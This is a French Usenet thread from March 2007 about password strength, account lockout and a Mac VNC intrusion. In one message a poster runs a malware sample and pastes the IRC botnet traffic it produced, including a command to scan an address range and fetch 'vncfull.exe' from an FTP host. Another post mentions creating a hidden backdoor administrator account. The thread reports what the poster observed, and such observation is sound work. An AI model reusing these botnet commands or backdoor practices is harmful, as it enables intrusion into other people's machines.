des informaticiens en faisant des ordinateurs fiables ?
Dureste, si le grand public n'aimait pas les suprises M$ n'aurait pas
une telles part de marché.

--
Nicolas

Gerald

unread,

Mar 5, 2007, 4:57:31 AM3/5/07

to

Nicolas MICHEL <Nicolas...@BonBon.net> wrote:

> Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
> sérieux. Perso j'utilises pwgen pour générer des mots de passe
> aléatoires mais n'importe quel password alpha-numérique autre que
> Ricardo01 devrait le faire.

quelqu'un avait donné ici la chaîne suivant à saisir dans le terminal
pour générer des mots de passe solides et aléatoires

openssl rand -base64 8

...que je trouve bien pratique. Qu'il en soit encore remercié !

--
Gérald

Erwan David

unread,

Mar 5, 2007, 5:09:46 AM3/5/07

to

Ger...@alussinan.org (Gerald) écrivait :

Pas si solides que ça : l'alphabet de sortie du base64 est un peu
limité (64 caractères seulement).

--
Erwan

Erwan David

unread,

Mar 5, 2007, 5:12:17 AM3/5/07

to

Ger...@alussinan.org (Gerald) écrivait :

Pas si solides que ça : l'alphabet de sortie du base64 est un peu
limité (64 caractères seulement), donc on a ici 2^48 possibilités, ce
qui est faible (en dessous de 2^64 on considère que la force brute est
faisable).

--
Erwan

Nina Popravka

unread,

Mar 5, 2007, 5:25:04 AM3/5/07

to

On Mon, 05 Mar 2007 11:12:17 +0100, Erwan David <er...@rail.eu.org>
wrote:

>Pas si solides que ça : l'alphabet de sortie du base64 est un peu
>limité (64 caractères seulement), donc on a ici 2^48 possibilités, ce
>qui est faible (en dessous de 2^64 on considère que la force brute est
>faisable).

Oui, sauf qu'il faut pas mélanger les torchons et les serviettes.
Sur des bécanes non sensibles, je préfère avoir un mot de passe pas
très robuste (vu de la fenêtre des Dieux de la crypto qui annoncent
que SHA-1 est faible puisqu'on pourrait le casser en quelques millions
au lieu de milliards d'années) et facilement mémorisable, plutôt qu'un
truc de la mort qui tue imbitable qui donc va traîner partout sur des
post-it ;->>>>>
Les attaques en force brute, c'est quand même réservé à une certaine
élite de cibles. Perso je n'en ai jamais vu, dans la cible d'activité
qui est la mienne.
--
Nina

Nina Popravka

unread,

Mar 5, 2007, 5:53:41 AM3/5/07

to

On Mon, 5 Mar 2007 10:41:14 +0100, Nicolas...@BonBon.net (Nicolas
MICHEL) wrote:

>Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
>défaut un utilisateur "admin" sans mots de passe ?

Non accessible de l'extérieur, mais il est vrai que ça facilite
furieusement les intrusions physiques :-)))))

>Bin oui, c'est super sécurisé M$ :>

Tu vas rire, mais quand tu parles de ça sur les NG M$, tu te fais
regarder comme un extra-terrestre par les participants et les MVPs
(MVP = Microsoft Valuable Professional = brave retraité ou étudiant ou
mère de famille utilisateur de Win auquel MS offre un abonnement MSDN,
en échange de son apport de support gratuit sur les ng microsoft.*)
Parce que tu vois, pour eux, au contraire, c'est une sécurité.
Je t'explique : des fois que tu oublierais le pass de ton compte, ben
le compte admin sans mot de pass est là pour te sauver.
Véridique...
--
Nina

Erwan David

unread,

Mar 5, 2007, 7:28:27 AM3/5/07

to

Nina Popravka <Nina@nospam> écrivait :

Oui, ça se défend. Mais là le openssl va surtout pas donner un truc
facile à retenir donc le risque que ça traine sur un postit sous le
clavier (pour utilisateur sensibilié, sur l'écran pour utilisateur non
sensibilisé) augmente beaucoup.

--
Erwan

Nina Popravka

unread,

Mar 5, 2007, 7:43:39 AM3/5/07

to

On Mon, 05 Mar 2007 13:28:27 +0100, Erwan David <er...@rail.eu.org>
wrote:

> un postit sous le

>clavier (pour utilisateur sensibilié, sur l'écran pour utilisateur non
>sensibilisé) augmente beaucoup.

Et dans le tiroir si la boîte est certifiée Défense ? ;->>>>>
--
Nina

Gerald

unread,

Mar 5, 2007, 7:59:42 AM3/5/07

to

Erwan David <er...@rail.eu.org> wrote:

> Oui, ça se défend. Mais là le openssl va surtout pas donner un truc
> facile à retenir donc le risque que ça traine sur un postit sous le
> clavier (pour utilisateur sensibilié, sur l'écran pour utilisateur non
> sensibilisé) augmente beaucoup.

à l'usage (et j'y ai converti quelques proches) au bout de quelques
jours on les retient sans problème et ça devient machinal. Plus
problématique si on choisit d'en changer souvent, mais sinon c'est glop.
Pour ce qui est du niveau de sécurité, je pense que même en ne prenant
que 5 ou 6 caractères (en faisant attention à y inclure des
diacritiques) on est déjà 20000 pieds au-dessus du niveau de sécurité de
99,9% des utilisateurs d'informatique personnelle.
Note que le code confidentiel des cartes bancaires ne comporte que 4
*chiffres* !

Et pour ce qui est du post-it : oui il existe *mais* c'est un fake :-)
juste pour énerver ! (pas totalement fake d'ailleurs mais seulement pour
me remettre sur la voie).

--
Gérald

Nina Popravka

unread,

Mar 5, 2007, 8:02:45 AM3/5/07

to

On Mon, 5 Mar 2007 13:59:42 +0100, Ger...@alussinan.org (Gerald)
wrote:

>Note que le code confidentiel des cartes bancaires ne comporte que 4
>*chiffres* !

Note qu'au bout de 3 essais infructueux la carte est avalée, système
qui est d'ailleurs également répandu en informatique sérieuse (compte
désactivé au bout de x logins foirés)
--
Nina

Erwan David

unread,

Mar 5, 2007, 8:28:04 AM3/5/07

to

Ger...@alussinan.org (Gerald) écrivait :

> Note que le code confidentiel des cartes bancaires ne comporte que 4
> *chiffres* !

Certes, mais au bout de 3 essais ratés => carte bloquée...

--
Erwan

Message has been deleted

Nina Popravka

unread,

Mar 5, 2007, 10:19:26 AM3/5/07

to

On Mon, 5 Mar 2007 15:48:31 +0100,
benoit....@leraillez.sansspam.com (Benoit Leraillez) wrote:

> Absolument, c'est le cas sur OS400.
Tout le monde le fait. Pour parler de ce que je connais, NT depuis NT4
au moins.

>Par contre OS X rallonge le
>délai entre deux tentatives
Ca, c'est la méthode LotusNotes,et ça devient rapidement
trèèèèèèèèèsssss long :-)
--
Nina

Nina Popravka

unread,

Mar 5, 2007, 10:35:57 AM3/5/07

to

Et pour clore le sujet, je viens de m'infecter pas à l'insu de mon
plein gré du tout avec un des trucs trouvés sur le FTP en question.
Dans la seconde qui suit le lancement du programme (qui n'était hier
pas reconnu par la majorité des anti-virus), ma bécane va causer à un
japonais et ils se racontent ça :

NICK L1-tn0o
USER yakrtfqjm "fo9.net" "lol" :yakrtfqjm

:expozed.gov 001 L1-tn0o :Welcome to the Internet Relay Chat Network, L1-tn0o
:expozed.gov 002 L1-tn0o :Your host is expozed.gov, running version 1.2.1546
:expozed.gov 003 L1-tn0o :This server was created Mar 1 2007 at 05:34:54 g( (Serial # 00-00-00)
:expozed.gov 004 L1-tn0o expozed.gov IRCXPRO1.2 acdefghiknoprstwxyzACEFGIJLPRS abdefghijklmnopqrstuvwxyzACEFIKLMOPT
:expozed.gov 005 L1-tn0o IRCX CHANTYPES=%#&+ MODES=6 NOQUIT SAFELIST WALLCHOPS NICKLEN=25 MAXCHANNELS=6 SILENCE=30 WATCH=128 :are available on this server
:expozed.gov 422 L1-tn0o :MOTD Not Present
:L1-tn0o MODE L1-tn0o :+ir
:expozed.gov 475 L1-tn0o #dbot :Cannot join channel (+k)

JOIN #dbot lock

:L1-tn0o!~yakr...@82.224.20.184 JOIN :#dbot
:expozed.gov 332 L1-tn0o #dbot :!scan 10 1 b 2 1 201.x.x.x !patch -s !bk 30 -s !setcftp ftp.hypermart.net 21 joh joh vncfull.exe
:expozed.gov 353 L1-tn0o @ #dbot :L1-tn0o
:expozed.gov 366 L1-tn0o #dbot :End of /NAMES list
:#dbot PRIVMSG #dbot :Leave Topic Alone!

PRIVMSG #dbot :Scanning: 201.x.x.x, 10 threads. Using CFTP.
PING :expozed.gov
PONG expozed.gov
JOIN #dbot lock

:expozed.gov 927 L1-tn0o #dbot :Already in the channel.

Et ensuite mon PC commence à faire ce qu'on lui a dit : scanner à fond
les manettes 201.0.0.0/8, direction port 5900.
Je ne l'ai pas laissé tourner assez longtemps pour voir ce qu'il se
passait quand il tombait sur une machine vulnérable, hein... ;->>>>

Un point positif : la merde est très facile à enlever.
On vit une époque formidable.
--
Nina

Message has been deleted

patpro ~ patrick proniewski

unread,

Mar 5, 2007, 12:43:58 PM3/5/07

to

In article <9ddhu2lcaeao6507h...@4ax.com>,
Nina Popravka <Nina@nospam> wrote:

> On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
> <RiG...@KkBoodin.wanadoo.fr> wrote:
>
> >Mon Mac était alors connecté au Net.
> Avec un machin IRC lancé en tâche de fond ?
>
> >et que ne feras pas un netstat -a,
> >> puis posteras le résultat ici, ça sera difficile de dire quoi que ce
> >> soit.
> >Dis moi comment faire ca , stp.
> Terminal, netstat -a

j'ai une préférence pour netstat -alnf inet

patpro

--
http://www.patpro.net/

Nina Popravka

unread,

Mar 5, 2007, 12:51:02 PM3/5/07

to

On Mon, 05 Mar 2007 18:43:58 +0100, patpro ~ patrick proniewski
<pat...@boleskine.patpro.net> wrote:

>j'ai une préférence pour netstat -alnf inet

Sûrement, mais je suis une dame âgée windowsienne, et je n'ai pas
encore réussi à mémoriser les paramètres de ps et ls.
Alors pour netstat, va falloir attendre 2008, je crains :-)
(je pense que je vais faire des fiches...)
--
Nina

Laurent Pertois

unread,

Mar 5, 2007, 1:56:46 PM3/5/07

to

Nina Popravka <Nina@nospam> wrote:

> Tout le monde le fait. Pour parler de ce que je connais, NT depuis NT4
> au moins.

AppleShare IP le faisait pour le service AFP :-D

--
Politically Correct Unix - UTILITIES
The "touch" command has been removed from the standard distribution due
to its inappropriate use by high-level managers.

Laurent Pertois

unread,

Mar 5, 2007, 1:56:46 PM3/5/07

to

Nina Popravka <Nina@nospam> wrote:

> Note qu'au bout de 3 essais infructueux la carte est avalée, système
> qui est d'ailleurs également répandu en informatique sérieuse (compte
> désactivé au bout de x logins foirés)

Voui, et d'ailleurs dans une école Suisse où j'étais allé faire une
formation ça plaisait bien aux élèves qui bloquaient les comptes des
profs avec ça... :->>>>

Nina Popravka

unread,

Mar 5, 2007, 2:08:51 PM3/5/07

to

On Mon, 5 Mar 2007 19:56:46 +0100, laurent...@alussinan.org
(Laurent Pertois) wrote:

>AppleShare IP le faisait pour le service AFP :-D

podom podom podom :-D
Dans NT4 par défaut le compte était niqué au bout de 3 essais (les
serveurs n'étaient pas encore grand public ;->>> )
J'avais très rapidement appris à créer un compte admin backdoor
planqué :-)
--
Nina

RiGuad

unread,

Mar 5, 2007, 2:52:24 PM3/5/07

to

Bon , ben je reviens sur la ligne de front...

Concernant le sujet des preservatifs (si, si...) j'ai desactivé celui du
Mac parce qu'il ne parle que des connections sortantes mais pas
entrantes, desactivé celui de mon modem routeur TrendNet TEW-435BRM,
parce qu'il ne cause qu'anglais , et l'anglais et moi quand il s'agit de
sujets pointus, ca fait trois, j'ai quitté VNC le temps d'etre sûr de
mes acces entrants, parce que cette histoire m'a bien fait flipper,
et... Je me suis attelé a l'etude de NetBarrier X4 dans sa version 10.4.1.

En une matinée, l'historique de NetBarrier me dis ceci :
-------------------
05/03/2007 15:30:23 88.168.97.111 Blocage d'une connexion entrante TCP